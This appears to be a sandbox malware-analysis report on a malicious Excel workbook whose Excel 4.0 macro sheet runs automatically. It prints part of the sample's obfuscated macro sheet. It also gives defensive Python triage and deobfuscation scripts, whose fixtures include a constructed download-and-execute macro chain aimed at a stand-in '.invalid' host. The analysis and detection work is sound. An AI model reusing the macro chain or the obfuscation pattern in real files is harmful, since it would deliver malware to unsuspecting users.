MALICIOUS
Risk Score: 182

Malware Insights

MITRE ATT&CK
- T1566.001 Spearphishing Attachment
- T1059.005 Visual Basic
- T1203 Exploitation for Client Execution
The sample is an OOXML Excel workbook carrying an Excel 4.0 (XLM) macro sheet (xl/macrosheets/sheet1.xml) that is wired for automatic execution through an _xlnm.Auto_Open defined name, as flagged by the OOXML_XLM_MACROSHEET and OOXML_XLM_AUTOOPEN_DEFINEDNAME heuristics. The macro sheet uses CALL, which invokes exported DLL functions directly, and RUN, which chains execution across the sheet, so arbitrary code runs without any VBA being involved (the macros are XLM, not Visual Basic; T1059.005 is simply the closest ATT&CK sub-technique, as there is no XLM-specific one). The macro's strings are assembled only at run time by concatenating shared-string fragments held in scattered cells (formulas of the form name=$EI$1266&$FH$28903&..., visible in the extracted sheet below), so no payload URL is recoverable from the static text; the five URLs listed under Embedded URL are OOXML namespace URIs from the sheet's own XML, not a download location. The document body contains a lure prompting the user to enable editing and content. Nothing in the carved artifact points to a memory-corruption exploit, so the T1203 mapping is not supported by the extracted evidence; the combination is that of a macro-based document built for initial access via a spearphishing attachment.
Heuristics (4)

- Excel 4.0 macro sheet (1 sheet) [critical, 2 related findings] OOXML_XLM_MACROSHEET
  Spreadsheet contains an Excel 4.0 (XLM) macro sheet. XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks.

- Excel 4.0 Auto_Open defined name [critical] OOXML_XLM_AUTOOPEN_DEFINEDNAME
  Workbook defines _xlnm.Auto_Open or _xlnm.Auto_Close while containing an XLM macro sheet. This is the OOXML/XLSB auto-execution shape for Excel 4.0 macros: the name points at the first cell of the macro, and Excel evaluates the formula chain from there as soon as macros are enabled.

- Dangerous XLM formula APIs: RUN, RETURN, CALL, HALT [critical] OOXML_XLM_DANGEROUS_FN
  Excel 4.0 macro sheet uses formula APIs that reach outside the workbook: =CALL and =REGISTER invoke exported Win32 DLL functions directly, =EXEC starts a process, and =FORMULA writes new formulas into cells at run time. These are the primitives used to download payloads, write files, and start processes from an XLM macro without invoking VBA. RUN, RETURN and HALT are control flow rather than OS access; they matter here because they stitch the scattered macro fragments into one execution path.

- Embedded URL [info] EMBEDDED_URL
  One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All five URLs below are XML namespace URIs declared on the macro sheet's root element (see the preview further down), not attacker infrastructure.
  - http://schemas.openxmlformats.org/spreadsheetml/2006/main (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/excel/2006/main (in document text: OOXML body / shared strings)
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships (in document text: OOXML body / shared strings)
  - http://schemas.openxmlformats.org/markup-compatibility/2006 (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac (in document text: OOXML body / shared strings)
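The three XLM heuristics above reduce to three checks on the OOXML package: a part under xl/macrosheets/, an _xlnm.Auto_Open or _xlnm.Auto_Close definedName in xl/workbook.xml, and formula text in the macro sheet that names CALL, EXEC, REGISTER, FORMULA or RUN. The following is an added example of those checks, not the analyzer's own code. It constructs a minimal workbook in memory (no [Content_Types].xml or relationships, so Excel would not open it, but the checks do not need them) and triages it. Only .xlsx/.xlsm XML parts are handled; .xlsb stores the same structures as binary records, which this does not parse. The CALL arguments in the fixture are constructed for the test and are not taken from the sample.

```python
"""Static triage of an OOXML workbook for the XLM heuristics described above."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

MAIN_NS = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
XM_NS = "http://schemas.microsoft.com/office/excel/2006/main"

# Formula APIs that reach outside the workbook or chain execution.  RETURN and
# HALT are plain control flow and are deliberately not in this list.
DANGEROUS_FN = re.compile(r"\b(CALL|EXEC|REGISTER|FORMULA(?:\.FILL)?|RUN)\s*\(")
AUTO_NAMES = {"_xlnm.Auto_Open", "_xlnm.Auto_Close"}


def triage_xlm(xlsx_bytes):
    """Return the XLM findings for one OOXML workbook supplied as bytes."""
    findings = {"macrosheets": [], "auto_names": [], "dangerous_fn": set(), "formulas": []}
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as zf:
        names = zf.namelist()
        # Heuristic 1: any XML part under xl/macrosheets/ is an Excel 4.0 macro sheet.
        findings["macrosheets"] = sorted(
            n for n in names if n.startswith("xl/macrosheets/") and n.endswith(".xml"))
        # Heuristic 2: Auto_Open/Auto_Close defined names live in xl/workbook.xml.
        if "xl/workbook.xml" in names:
            wb = ET.fromstring(zf.read("xl/workbook.xml"))
            for dn in wb.iter(f"{{{MAIN_NS}}}definedName"):
                if dn.get("name") in AUTO_NAMES:
                    findings["auto_names"].append((dn.get("name"), (dn.text or "").strip()))
        # Heuristic 3: scan every <f> element of every macro sheet for the dangerous APIs.
        for part in findings["macrosheets"]:
            sheet = ET.fromstring(zf.read(part))
            for f in sheet.iter(f"{{{MAIN_NS}}}f"):
                text = f.text or ""
                findings["formulas"].append(text)
                for m in DANGEROUS_FN.finditer(text):
                    findings["dangerous_fn"].add(m.group(1))
    # The auto-exec finding needs both halves: a macro sheet AND an auto name.
    findings["auto_exec"] = bool(findings["macrosheets"]) and bool(findings["auto_names"])
    return findings


def build_sample_xlsx(with_macrosheet=True):
    """Construct a minimal workbook with the shapes the heuristics look for (test fixture)."""
    workbook_xml = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<workbook xmlns="{MAIN_NS}"><sheets><sheet name="Macro1" sheetId="1"/></sheets>'
        '<definedNames><definedName name="_xlnm.Auto_Open">Macro1!$A$1</definedName>'
        '</definedNames></workbook>'
    )
    # Constructed macro chain: download via CALL, launch via EXEC, chain via RUN, stop via HALT.
    macrosheet_xml = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<xm:macrosheet xmlns="{MAIN_NS}" xmlns:xm="{XM_NS}"><sheetData>'
        '<row r="1"><c r="A1" t="b"><f>CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,$B$1,$C$1,0,0)</f><v>0</v></c></row>'
        '<row r="2"><c r="A2" t="b"><f>EXEC($C$1)</f><v>0</v></c></row>'
        '<row r="3"><c r="A3" t="b"><f>RUN($D$1)</f><v>0</v></c></row>'
        '<row r="4"><c r="A4" t="b"><f>HALT()</f><v>0</v></c></row>'
        '</sheetData></xm:macrosheet>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("xl/workbook.xml", workbook_xml)
        if with_macrosheet:
            zf.writestr("xl/macrosheets/sheet1.xml", macrosheet_xml)
    return buf.getvalue()


if __name__ == "__main__":
    result = triage_xlm(build_sample_xlsx())
    print("macro sheets:", result["macrosheets"])
    print("auto names:  ", result["auto_names"])
    print("dangerous:   ", sorted(result["dangerous_fn"]))
    print("auto-exec:   ", result["auto_exec"])
```

To run it on a real file, replace the fixture with `triage_xlm(open(path, "rb").read())`; a workbook that defines the auto name without any macro sheet scores `auto_exec` False, matching the heuristic's "while containing an XLM macro sheet" condition.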
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_sheet_00.xml | xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/sheet1.xml | 42722 bytes |

SHA-256: 5da131280f3eb792390f1d57ba325826dcf30294cf60d9f284a8096af3742b4f

Preview (first 1,000 lines of the extracted script; formula text is shown as decoded by the analyzer, so `&` appears unescaped):

```xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac">
<dimension ref="A65:IO59838"/>
<sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews>
<sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
<sheetData>
<row r="65" spans="65:65" x14ac:dyDescent="0.25"><c r="BM65"><v>42790</v></c></row>
<row r="66" spans="65:65" x14ac:dyDescent="0.25"><c r="BM66"><v>25</v></c></row>
<row r="265" spans="209:209" x14ac:dyDescent="0.25"><c r="HA265" t="s"><v>12</v></c></row>
<row r="657" spans="211:211" x14ac:dyDescent="0.25"><c r="HC657" t="s"><v>30</v></c></row>
<row r="732" spans="74:74" x14ac:dyDescent="0.25"><c r="BV732" t="s"><v>32</v></c></row>
<row r="741" spans="162:162" x14ac:dyDescent="0.25"><c r="FF741" t="s"><v>11</v></c></row>
<row r="963" spans="162:162" x14ac:dyDescent="0.25"><c r="FF963"><v>3</v></c></row>
<row r="1266" spans="139:139" x14ac:dyDescent="0.25"><c r="EI1266" t="s"><v>45</v></c></row>
<row r="1531" spans="229:229" x14ac:dyDescent="0.25"><c r="HU1531" t="b"><f bx="1">HxoCMuuiUvSe=$EI$1266&$FH$28903&$CU$6500&$EK$32740&$BZ$22136&$H$26831</f><v>0</v></c></row>
<row r="1532" spans="229:229" x14ac:dyDescent="0.25"><c r="HU1532" t="b"><f bx="1">sardhIvsmFCZu=$FG$50321</f><v>0</v></c></row>
<row r="1533" spans="229:229" x14ac:dyDescent="0.25"><c r="HU1533" t="b"><f>$IF$41831()</f><v>0</v></c></row>
<row r="1534" spans="229:229" x14ac:dyDescent="0.25"><c r="HU1534" t="b"><f>RUN($HL$17319)</f><v>0</v></c></row>
<row r="2053" spans="40:40" x14ac:dyDescent="0.25"><c r="AN2053" t="b"><f bx="1">HxoCMuuiUvSe=$EY$45248&$ED$23691&$AR$53563&$N$29849&$V$23783&$DX$4218&$Y$54889&$EM$31731&$HM$41911&$IB$27675&$BY$59232&$BC$36839&$DE$25292&$FR$9736&$H$31251&$J$52064&$HC$5497&$BE$58635</f><v>0</v></c></row>
<row r="2054" spans="40:40" x14ac:dyDescent="0.25"><c r="AN2054" t="b"><f bx="1">sardhIvsmFCZu=$GI$39099</f><v>0</v></c></row>
<row r="2055" spans="40:40" x14ac:dyDescent="0.25"><c r="AN2055" t="b"><f>$IF$41831()</f><v>0</v></c></row>
<row r="2056" spans="40:40" x14ac:dyDescent="0.25"><c r="AN2056" t="b"><f>RUN($DO$7275)</f><v>0</v></c></row>
<row r="2380" spans="22:22" x14ac:dyDescent="0.25"><c r="V2380" t="s"><v>11</v></c></row>
<row r="2536" spans="165:165" x14ac:dyDescent="0.25"><c r="FI2536" t="s"><v>18</v></c></row>
<row r="2636" spans="199:199" x14ac:dyDescent="0.25"><c r="GQ2636" t="s"><v>1</v></c></row>
<row r="2756" spans="206:206" x14ac:dyDescent="0.25"><c r="GX2756" t="s"><v>11</v></c></row>
<row r="3029" spans="187:200" x14ac:dyDescent="0.25"><c r="GE3029" t="s"><v>32</v></c></row>
<row r="3034" spans="187:200" x14ac:dyDescent="0.25"><c r="GR3034" t="s"><v>24</v></c></row>
<row r="3565" spans="47:47" x14ac:dyDescent="0.25"><c r="AU3565" t="s"><v>34</v></c></row>
<row r="3701" spans="87:87" x14ac:dyDescent="0.25"><c r="CI3701" t="s"><v>39</v></c></row>
<row r="3965" spans="60:60" x14ac:dyDescent="0.25"><c r="BH3965" t="s"><v>2</v></c></row>
<row r="4218" spans="128:128" x14ac:dyDescent="0.25"><c r="DX4218" t="s"><v>20</v></c></row>
<row r="4274" spans="209:209" x14ac:dyDescent="0.25"><c r="HA4274" t="s"><v>19</v></c></row>
<row r="5162" spans="135:135" x14ac:dyDescent="0.25"><c r="EE5162" t="s"><v>12</v></c></row>
<row r="5172" spans="245:245" x14ac:dyDescent="0.25"><c r="IK5172" t="s"><v>32</v></c></row>
<row r="5456" spans="81:81" x14ac:dyDescent="0.25"><c r="CC5456" t="s"><v>14</v></c></row>
<row r="5497" spans="211:211" x14ac:dyDescent="0.25"><c r="HC5497" t="s"><v>10</v></c></row>
<row r="5745" spans="172:172" x14ac:dyDescent="0.25"><c r="FP5745" t="s"><v>32</v></c></row>
<row r="5777" spans="92:92" x14ac:dyDescent="0.25"><c r="CN5777" t="s"><v>22</v>< ... (truncated)
```

Reading the preview: cells with `t="s"` hold shared-string indices (for example DX4218 holds index 20 and HC5497 index 10, both referenced from the concatenation in AN2053), the `bx="1"` formulas assign the concatenated result to defined names (HxoCMuuiUvSe, sardhIvsmFCZu), `$IF$41831()` invokes the macro starting at that cell, and `RUN($HL$17319)` / `RUN($DO$7275)` transfer execution to the next fragment. The workbook's sharedStrings.xml, which holds the actual fragment text, is not part of this carved artifact.
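The obfuscation in the preview is purely structural: string fragments sit in scattered cells as shared-string references, name=...&...&... formulas glue them together, and `$X$n()` and RUN($X$n) hop between fragments. Resolving it statically needs nothing more than a cell map and a `&` evaluator. The following is an added example of that, not the analyzer's code. Because the page does not include the sample's sharedStrings.xml, the macro sheet and the fragments below are constructed to mirror the shapes in the preview (same cell addresses and defined names, a reserved `.invalid` host), so the recovered strings are illustrative only; on disk the `&` inside `<f>` is stored as `&amp;`, which is what the fixture uses.

```python
"""Resolve XLM cell-concatenation strings and list control transfers in a macro sheet."""
import re
import xml.etree.ElementTree as ET

MAIN_NS = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"

ASSIGN = re.compile(r"^([A-Za-z_][\w.]*)=(.+)$")          # name=<expr>
REF = re.compile(r"^\$([A-Z]{1,3})\$(\d+)$")              # $EI$1266
CALL_SUB = re.compile(r"^\$([A-Z]{1,3})\$(\d+)\(\)$")     # $IF$41831(): macro at that cell is called
RUN_CALL = re.compile(r"^RUN\(\$([A-Z]{1,3})\$(\d+)\)$")  # RUN($HL$17319): execution jumps there

# Constructed fixture mirroring the preview's shapes; not the sample's real content.
SAMPLE_MACROSHEET = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"
               xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
<sheetData>
<row r="265"><c r="HA265" t="s"><v>0</v></c></row>
<row r="657"><c r="HC657" t="s"><v>1</v></c></row>
<row r="741"><c r="FF741" t="s"><v>2</v></c></row>
<row r="1266"><c r="EI1266" t="s"><v>3</v></c></row>
<row r="1531"><c r="HU1531" t="b"><f bx="1">HxoCMuuiUvSe=$EI$1266&amp;$HA$265&amp;$HC$657&amp;$FF$741</f><v>0</v></c></row>
<row r="1532"><c r="HU1532" t="b"><f bx="1">sardhIvsmFCZu=$FF$741</f><v>0</v></c></row>
<row r="1533"><c r="HU1533" t="b"><f>$IF$41831()</f><v>0</v></c></row>
<row r="1534"><c r="HU1534" t="b"><f>RUN($HL$17319)</f><v>0</v></c></row>
</sheetData>
</xm:macrosheet>"""

# Constructed sharedStrings.xml; the fragments spell out a host under the reserved .invalid TLD.
SAMPLE_SHARED_STRINGS = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="4" uniqueCount="4">
<si><t>example</t></si><si><t>.invalid</t></si><si><t>/stage2</t></si><si><t>https://</t></si>
</sst>"""


def load_shared_strings(sst_xml):
    """sharedStrings.xml -> list indexed by the <v> of every t="s" cell."""
    root = ET.fromstring(sst_xml.encode("utf-8"))
    return ["".join(t.text or "" for t in si.iter(f"{{{MAIN_NS}}}t"))
            for si in root.iter(f"{{{MAIN_NS}}}si")]


def load_cells(macrosheet_xml, shared):
    """Return {cellref: (formula or None, value as text)} in document order."""
    cells = {}
    for c in ET.fromstring(macrosheet_xml.encode("utf-8")).iter(f"{{{MAIN_NS}}}c"):
        f = c.find(f"{{{MAIN_NS}}}f")
        v = c.find(f"{{{MAIN_NS}}}v")
        raw = (v.text or "") if v is not None else ""
        # t="s" means <v> is a shared-string index; otherwise <v> is the literal value.
        value = shared[int(raw)] if c.get("t") == "s" and raw else raw
        cells[c.get("r")] = (f.text if f is not None else None, value)
    return cells


def resolve_concat(expr, cells):
    """Evaluate `$A$1&$B$2&...` by substituting each referenced cell's stored value.

    Only '&' over absolute references is handled, the shape the preview uses.  A
    cell missing from the sheet contributes "" just as an empty cell does in
    Excel; any other expression returns None so it is not misreported.
    """
    out = []
    for part in expr.split("&"):
        m = REF.match(part.strip())
        if not m:
            return None
        out.append(cells.get(m.group(1) + m.group(2), (None, ""))[1])
    return "".join(out)


def recover_strings(cells):
    """Map each defined name assigned by a formula to its statically resolved text."""
    recovered = {}
    for formula, _value in cells.values():
        m = ASSIGN.match(formula or "")
        if m:
            text = resolve_concat(m.group(2), cells)
            if text is not None:
                recovered[m.group(1)] = text
    return recovered


def control_transfers(cells):
    """List (source cell, target cell, kind) for `$X$n()` calls and RUN($X$n) jumps."""
    out = []
    for ref, (formula, _value) in cells.items():
        for pattern, kind in ((CALL_SUB, "call"), (RUN_CALL, "RUN")):
            m = pattern.match(formula or "")
            if m:
                out.append((ref, m.group(1) + m.group(2), kind))
    return out


if __name__ == "__main__":
    shared = load_shared_strings(SAMPLE_SHARED_STRINGS)
    cells = load_cells(SAMPLE_MACROSHEET, shared)
    for name, text in recover_strings(cells).items():
        print(f"{name} = {text!r}")
    for src, dst, kind in control_transfers(cells):
        print(f"{src}: {kind} -> {dst}")
</```

Against the real sample, feed `load_cells` the carved xl/macrosheets/sheet1.xml and `load_shared_strings` the workbook's xl/sharedStrings.xml; the recovered values for HxoCMuuiUvSe and sardhIvsmFCZu are then the strings the macro would hand to CALL, and the control-transfer list gives the order in which to follow the fragments from the Auto_Open cell.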